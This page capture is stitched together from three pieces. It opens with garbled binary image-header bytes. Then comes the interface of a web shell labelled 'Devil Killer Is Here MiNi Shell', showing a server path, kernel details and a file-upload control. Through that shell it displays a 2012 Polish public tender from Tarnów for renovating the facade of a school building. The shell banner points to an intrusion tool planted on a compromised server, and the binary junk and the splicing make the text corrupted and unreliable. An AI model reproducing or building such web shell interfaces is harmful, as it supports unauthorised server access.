JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120424/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120424/130248-N-2012.html

<p class="kh_header"><b>Tarnów: Odnowienie elewacji budynku I Liceum Ogólnokształcącego im. K. Brodzińskiego w Tarnowie, ul. Piłsudskiego 4</b><br>
<b>Numer ogłoszenia: 130248 - 2012; data zamieszczenia: 24.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miasta Tarnowa Wydział Realizacji Inwestycji , ul. Nowa 4/327, 33-100 Tarnów, woj. małopolskie, tel. 014 6882708, faks 014 6222833.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.tarnow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odnowienie elewacji budynku I Liceum Ogólnokształcącego im. K. Brodzińskiego w Tarnowie, ul. Piłsudskiego 4.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Zakres robót wchodzących w skład zadania obejmuje wykonanie pełnego zakresu robót podanego poniżej dotyczącego elewacji południowej i wschodniej, zgodnie z opracowaną dokumentacją techniczną w istniejących warunkach terenowych. Zakres robót podlegających trybowi przetargowemu musi być wykonany w sposób zgodny z zasadami wiedzy technicznej i specyfikacjami technicznymi wykonania i odbioru robót budowlanych dla tego typu obiektów, łącznie z robotami towarzyszącymi.

2.	Zakres robót obejmuje między innymi:

1) prace budowlane - izolacja fundamentów i wykonanie opaski:
a)	odkopanie fundamentów; 
b)	oczyszczenie fundamentów poprzez piaskowanie pod ciśnieniem; 
c)	odkucie zmurszałych spoin i cegieł oraz wykonanie niezbędnych przemurowań; 
d)	szczelne obłożenie folią kubełkową ściany fundamentowej; 
e)	skucie asfaltu na szerokości 1,5 m i ułożenie opaski z kostki betonowej; 
f)	 ułożenie opaski z kostki betonowej o szerokości 0,5 m; 

2) prace budowlane - elementy metalowe:
a)	demontaż starych ofasowań blacharskich parapetów i gzymsów; 
b)	wykonanie nowych ofasowań z blachy tytanowo-cynkowej; 
c)	demontaż krat przeznaczonych do usunięcia; 
d)	oczyszczenie z rdzy i warstw lakierów krat w pozostałych oknach; 
e)	rekonstrukcja brakujących elementów metalowych; 
f)	wykonanie nowych krat; 
g)	przeszlifowanie powierzchni metalu papierem ściernym; 
h)	dwukrotne malowanie farbą antykorozyjną; 
i)	dwukrotne pomalowanie lakierem poliuretanowym; 

3) prace budowlane - odnowienie tynku i kominy:
a)	ustawienie rusztowań; 
b)	zabezpieczenie otworów okiennych i drzwiowych przez oklejenie taśmami i foliami polietylenowymi; 
c)	oczyszczenie pierwotnej powierzchni tynków na powierzchniach płaskich oraz powierzchni dekoracji sztukatorskich metodą strumieniowo-ścierną półsuchą z mgłą wodną; 
d)	ręczne oczyszczenie dekoracji sztukatorskiej przy pomocy dłut kamieniarskich; 
e)	odkucie wszystkich wadliwych uzupełnień dekoracji sztukatorskiej przy użyciu dłut kamieniarskich; 
f)	skucie fragmentów odparzonych, odspojonych i osłabionych tynków na powierzchniach płaskich (głównie w okolicach rur spustowych); 
g)	skucie tynków wraz z boniowaniem do wysokości gzymsu kordonowego na elewacjach; 
h)	wykonanie niezbędnych prac murarskich; 
i)	oczyszczenie powierzchni muru z pyłu za pomocą zimnej wody pod ciśnieniem; 
j)	wzmocnienie strukturalne muru w przypadku znacznego osłabienia podłoża; 
k)	wykonanie tynków odsalających w kondygnacji przyziemie oraz w okolicach rur spustowych  i wykonanie obrzutki; 
l)	nałożenie tynku szerokoporowego; 
m)	uzupełnienie tynków na powierzchniach płaskich (jako obrzutka zaprawa wapienno-cementowa z białym cementem; głębsze ubytki zaprawa wapienno-piaskowa); 
n)	wykonanie końcowej warstwy tynku na powierzchniach płaskich i zatarcie na gładko; 
o)	podklejenie odspojeń elementów sztukatorskich do podłoża; 
p)	impregnacja strukturalna osłabionych partii dekoracji sztukatorskiej preparatem krzemoorganicznym; 
q)	wklejenie konstrukcji z drutu mosiężnego w miejscach planowanych uzupełnień większych ubytków sztukaterii i gzymsów; 
r)	rekonstrukcja i uzupełnienie ubytków dekoracji sztukatorskiej; 
s)	rekonstrukcja i uzupełnienie ubytków elementów wykonanych metodą ciągnioną; 
t)	po wyschnięciu wszystkich tynków dwukrotne malowanie farbą silikonową (hydrofobową); 
u)	zabezpieczenie tynków w części parterowej do wysokości 3,00 m od poziomu terenu preparatem anty-graffiti;
v)	tynkowanie kominów z wyprawą elewacyjną zgodną z technologią naprawy i wykończenia ścian zewnętrznych. 

4) prace budowlane - odnowienie elementów kamiennych:

- cokół:
a)	odkucie zaprawy betonowej; 
b)	oczyszczenie powierzchni kamienia z brudu metodą strumieniowo-ścierną półsuchą z mgłą wodną; 
c)	usunięcie glonów; 
d)	wykucie cementowych spoin i uzupełnień; 
e)	wytypowanie ciosów kamiennych do wymiany; 
f)	wykucie zniszczonych ciosów piaskowca w części cokołowej; 
g)	montaż zrekonstruowanych ciosów kamiennych na mineralnej zaprawie wodoodpornej; 
h)	nadanie faktury groszkowej ciosom cokołu; 
i)	uzupełnienie zaprawy w spoinach między ciosami; 
j)	zabezpieczenie  powierzchni kamienia przez wykonanie cienkiej powłoki hydrofobowej. 

- portal wejścia głównego:
a)	oczyszczenie powierzchni kamienia z brudu metodą strumieniowo-ścierną półsuchą z mgłą wodną;
b)	wykucie wadliwych uzupełnień kamienia; 
c)	odsolenie zasolonych fragmentów przez założenie kompresów z ligniny nasączonej wodą destylowaną; 
d)	wzmocnienie osłabionych fragmentów preparatem krzemoorganicznym; 
e)	wykonanie konstrukcji z drutu nierdzewnego wklejonego na żywicy epoksydowej pod uzupełnienia zaprawą większych fragmentów kamienia; 
f)	wycięcie gniazd w miejscach przeznaczonych do wklejenia taszli;
g)	wklejenie taszli; 
h)	uzupełnienie ubytków kamienia i rekonstrukcja zniszczonych fragmentów; 
i)	zabezpieczenie powierzchni kamienia przez wykonanie cienkiej powłoki hydrofobowej.

5) prace budowlane - ślusarka drzwiowa:
a)	demontaż drzwi i montaż drzwi zastępczych z wyjątkiem drzwi wejściowych;
b)	oczyszczenie metalowych drzwi metodą strumieniowo-ścierną; 
c)	rekonstrukcja i mocowanie w miejscu ekspozycji brakujących elementów metodą spawania; 
d)	oczyszczenie powierzchni herbów; 
e)	odtłuszczenie i odpylenie powierzchni metalu rozpuszczalnikiem; 
f)	zabezpieczenie powierzchni metalu przed korozją farbą; 
g)	wstawienie brakujących szyb; 
h)	dwukrotne malowanie farbą antykorozyjną; 
i)	montaż drzwi w miejscu ekspozycji. 

6) roboty uzupełniające i zabezpieczające:
a)	szpachlowanie, tynkowanie, roboty malarskie po wymianie stolarki; 
b)	demontaż i ponowny montaż krat okiennych; 
c)	przed przystąpieniem do robót termomodernizacyjnych zabezpieczyć folią wymienione okna;
d)	istniejące zieleńce, drzewa należy zabezpieczyć przed ich zabrudzeniem, a po zakończeniu robót oddać w stanie niepogorszonym.

2.1. Ze względu na czynny obiekt szkolny w trakcie realizacji robót należy zwrócić szczególną uwagę na bezpieczeństwo w trakcie prowadzonych robót poprzez oznakowanie placu budowy, wykonanie zabezpieczeń siatką rusztowań oraz wejść do budynku, jak również uniemożliwienie młodzieży wspinania się na rusztowanie.
2.2. Wykonawca ze szczególną starannością i we właściwy sposób zabezpieczy i oznakuje teren prowadzenia robót. Należy uporządkować teren po zakończeniu robót i naprawić wszelkie szkody powstałe wyniku realizacji zadania.
2.3.	Wykonawca we własnym zakresie uzyska wszelkie zgody na wejście w teren oraz zajęcie chodnika i ewentualnie pasa jezdni.
2.4.	Do oferty należy przyjąć kolory pełne, natomiast ostateczna kolorystyka zostanie uzgodniona z wyłonionym Wykonawcą oraz Konserwatorem Zabytków.
2.5.  Po stronie Wykonawcy będzie znajdowało się uzyskanie pozwolenia na wejście w teren i lokalizację urządzeń związanych z wykonaniem docieplenia budynku. Ewentualne koszty z tego tytułu należy doliczyć do oferty.
2.6. Roboty budowlane będą realizowane na podstawie projektu, wykonanego przez 
E-certificate Sp. z o.o., Kraków, który określa zakres i sposób wykonania robót.
2.8. UWAGA: zakres niniejszego postępowania przetargowego obejmuje wykonanie prac dotyczących wyłącznie elewacji południowej i wschodniej. Pozostałego zakresu nie należy wyceniać.

3.	Załącznikami do Specyfikacji Istotnych Warunków Zamówienia (SIWZ) są: projekt budowlany i wykonawczy, specyfikacja techniczna wykonania i odbioru robót, przedmiary robót.
4.	 Do wykonania robót należy użyć materiałów posiadających wymagane atesty 
i certyfikaty zgodnie z dyrektywą 89/106/EWG, które będą wymagane przy odbiorze końcowym.
5.	 Zaleca się, aby Wykonawca dokonał wizji lokalnej terenu budowy i jego otoczenia. Koszty dokonania wizji lokalnej terenu budowy poniesie Wykonawca.
6.	 Na podstawie art. 38 ust. 1 ustawy Prawo zamówień publicznych - w przypadkach wątpliwych - Wykonawca może zwrócić się do Zamawiającego o wyjaśnienie treści SIWZ. W przypadku, gdy Wykonawcy nie zgłaszają uwag, Zamawiający uzna, że brak jest zastrzeżeń do dokumentów opisujących przedmiot zamówienia.
7.	 Wykonawca ponosi odpowiedzialność za szkody wynikłe na terenie budowy w czasie od daty protokolarnego przejęcia terenu budowy przez Wykonawcę do daty protokolarnego oddania budowy (odbioru końcowego robót).
8.	 Organizacja robót prowadzona będzie przez Wykonawcę zgodnie z wymogami BHP oraz ppoż.
9.	 Zamawiający wymaga udzielenia min. 36 miesięcy rękojmi (gwarancji jakości) na wykonany przedmiot zamówienia - roboty budowlane od daty protokolarnego odbioru pełnego zakresu robót.
10.	Na potwierdzenie spełnienia powyższych wymagań Wykonawca składa w ofercie oświadczenie o czasie udzielonej rękojmi (gwarancji jakości) na wykonane roboty budowlane.
11.	Wymaga się, aby zgłoszony przez Wykonawcę kierownik budowy był obecny na terenie budowy w trakcie realizacji robót..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.32.00.00-6, 45.45.30.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca obowiązany jest do wniesienia wadium w wysokości 15.000,00 zł (słownie: piętnaście tysięcy złotych).</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku. Zamawiający dokona oceny  spełniania warunku na podstawie analizy treści oświadczenia - pkt.III.4.1</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie mogą ubiegać się Wykonawcy, którzy zrealizowali w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, minimum 1 robotę budowlaną polegającą na wykonaniu renowacji lub remontu elewacji budynku/ów (użyteczności publicznej, zamieszkania zbiorowego lub sakralnych) wpisanego/ych do rejestru zabytków o wartości robót nie mniejszej niż 500.000 zł brutto. Zamawiający wymaga załączenia dokumentów potwierdzających, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.
Jeżeli Wykonawca w przetargu polega zasobach innego podmiotu - wiedzy i doświadczeniu (niezależnie od charakteru prawnego łączących go z nimi stosunków):
a) podmiot ten musi uczestniczyć w wykonywaniu zamówienia, ponadto z dokumentów musi wynikać, że roboty budowlane zrealizowane przez ten podmiot zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone,
b) zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował tymi zasobami
- w szczególności przedstawia w tym celu w oryginale pisemne zobowiązanie tego/tych podmiotu/ów do oddania mu do dyspozycji wiedzy i doświadczenia jak wskazano wyżej, na okres korzystania przy wykonywaniu zamówienia.

Zamawiający dokona oceny  spełniania warunku na podstawie analizy treści dokumentów i oświadczenia - pkt.III.4.1.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku. Zamawiający dokona oceny  spełniania warunku na podstawie analizy treści oświadczenia - pkt.III.4.1</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga wykazania, że Wykonawca dysponuje lub będzie dysponował minimum:
a)	jedną osobą przewidzianą do kierowania budową, która zgodnie z art. 24 ust. 2 Rozporządzenia Ministra Kultury i Dziedzictwa Narodowego z dnia 27 lipca 2011 r. w sprawie prowadzenia prac konserwatorskich, prac restauratorskich, robót budowlanych, badań konserwatorskich, badań architektonicznych i innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych (Dz. U. z 2011 r. nr 165, poz. 987) posiada uprawnienia do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej co najmniej w ograniczonym zakresie, oraz odbyła co najmniej 2-letnią praktykę zawodową na budowie przy zabytkach nieruchomych wpisanych do rejestru zabytków. Osoba będzie pełniła funkcję kierownika budowy.
b)	jedną osobą przewidzianą do prac konserwatorskich, która posiada kwalifikacje zgodne z § 22 Rozporządzenia Ministra Kultury i Dziedzictwa Narodowego z dnia 27 lipca 2011 r. w sprawie prowadzenia prac konserwatorskich, prac restauratorskich, robót budowlanych, badań konserwatorskich, badań architektonicznych i innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych (Dz. U. nr 165, poz. 987). 
Zgodnie ze wskazanym przepisem, cyt: 
§ 22. 1. Prace konserwatorskie, prace restauratorskie oraz badania konserwatorskie może prowadzić, w zakresie specjalności określonej w dyplomie ukończenia studiów, osoba, która posiada tytuł zawodowy magistra uzyskany po ukończeniu studiów wyższych:
	1)	na kierunku konserwacja i restauracja dzieł sztuki lub
	2)	w specjalności w zakresie konserwacji zabytków
- oraz odbyła po ukończeniu tych studiów co najmniej 12-miesięczną praktykę zawodową w zakresie konserwacji lub badania zabytków wpisanych do rejestru zabytków.
2. W dziedzinach nieobjętych programem studiów wyższych, o których mowa w ust. 1, prace konserwatorskie, prace restauratorskie oraz badania konserwatorskie może prowadzić osoba, która posiada:
	1)	świadectwo ukończenia szkoły średniej zawodowej oraz tytuł zawodowy albo wykształcenie średnie i dyplom potwierdzający posiadanie kwalifikacji zawodowych w zawodach odpowiadających danej dziedzinie lub
	2)	dyplom mistrza w zawodzie odpowiadającym danej dziedzinie
- oraz odbyła co najmniej 5-letnią praktykę zawodową w zakresie konserwacji lub badania zabytków wpisanych do rejestru zabytków.
c)	jedną osobą posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie instalacji elektrycznych co najmniej w ograniczonym zakresie oraz posiadającą minimum 2-letnie doświadczenie w kierowaniu robotami budowlanymi. Osoba ta będzie pełniła funkcję kierownika robót w zakresie instalacji elektrycznych.

W przypadku uprawnień i kwalifikacji dla osób dopuszcza się odpowiadające im uprawnienia i kwalifikacje, które zostały wydane na podstawie wcześniej obowiązujących przepisów lub odpowiadające im kwalifikacje zawodowe nabyte w państwach członkowskich Unii Europejskiej, Konfederacji Szwajcarskiej lub Europejskiego Porozumienia o Wolnym Handlu (EFTA) - stronach umowy o Europejskim Obszarze Gospodarczym, pod warunkiem, że zachowują swoją ważność oraz z zastrzeżeniem przepisu art. 12a ustawy Prawo budowlane (Dz. U. z 2010, Nr 243, poz. 1623 z późn. zm.) i przepisów ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2008 r., Nr 63, poz. 394).

Jeżeli Wykonawca (niezależnie od charakteru prawnego łączących stosunków z innymi podmiotami) polega na zasobach innych podmiotów - osobach zdolnych do wykonania zamówienia, zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował tymi zasobami. W szczególności przedstawia w tym celu w oryginale pisemne zobowiązanie tego-tych podmiotu-ów do oddania mu do dyspozycji osób jak wskazano wyżej, na okres korzystania z tych osób przy wykonywaniu zamówienia. 
Zamawiający dokona oceny spełniania warunku na podstawie analizy treści dokumentu i oświadczenia - pkt III.4.1.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku. Zamawiający dokona oceny  spełniania warunku na podstawie analizy treści oświadczenia - pkt. III.4.1.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	W celu wykazania, że wykonawca nie podlega wykluczeniu z postępowania na podstawie art. 24 ust. 2 ustawy przedkłada oświadczenia i dokumenty określone, w pkt. III.4. oraz dowód wniesienia wadium.
2.	Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa powyżej w pkt III.4.3.1), zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania (wystawionym nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert).
3.	W przypadku, gdy uprawnienie do podpisania oferty, oświadczeń i dokumentów nie wynika z dokumentów, o których mowa w pkt III.4.2, do oferty należy załączyć stosowne pełnomocnictwo podpisane przez osobę(y) uprawnioną(e) do zaciągania zobowiązań cywilno-prawnych w imieniu Wykonawcy.
4.	Zamawiający uzna za spełniony warunek dysponowania osobami zdolnymi do wykonania zamówienia w przypadku, gdy przynajmniej jeden z członków konsorcjum będzie spełniał wymagany warunek, bądź warunek zostanie spełniony łącznie.
5.	Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu w oryginale pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia (art. 26 ust 2b ustawy Pzp).
6.	W przypadku, gdy Wykonawca będzie polegać na wiedzy i doświadczeniu innego podmiotu, pisemne zobowiązanie winno zawierać informację o sposobie udostępnienia wiedzy i doświadczenia, tj. w jakim charakterze podmiot ten będzie uczestniczył w wykonaniu zamówienia.
7.	W przypadku, gdy złożone przez Wykonawców dokumenty na potwierdzenie spełnienia warunków udziału w postępowaniu będą zawierały kwoty wyrażone w walutach innych niż PLN, do oceny spełniania każdego warunku zawierającego kwotę lub kwoty, wielkości te zostaną przeliczone według średniego kursu Narodowego Banku Polskiego (NBP) opublikowanego w dniu ukazania się ogłoszenia o przetargu w Biuletynie Zamówień Publicznych UZP. Średnie kursy walut dostępne są pod adresem: http://www.nbp.pl/home.aspx?f=/Kursy/kursy.htm</p>
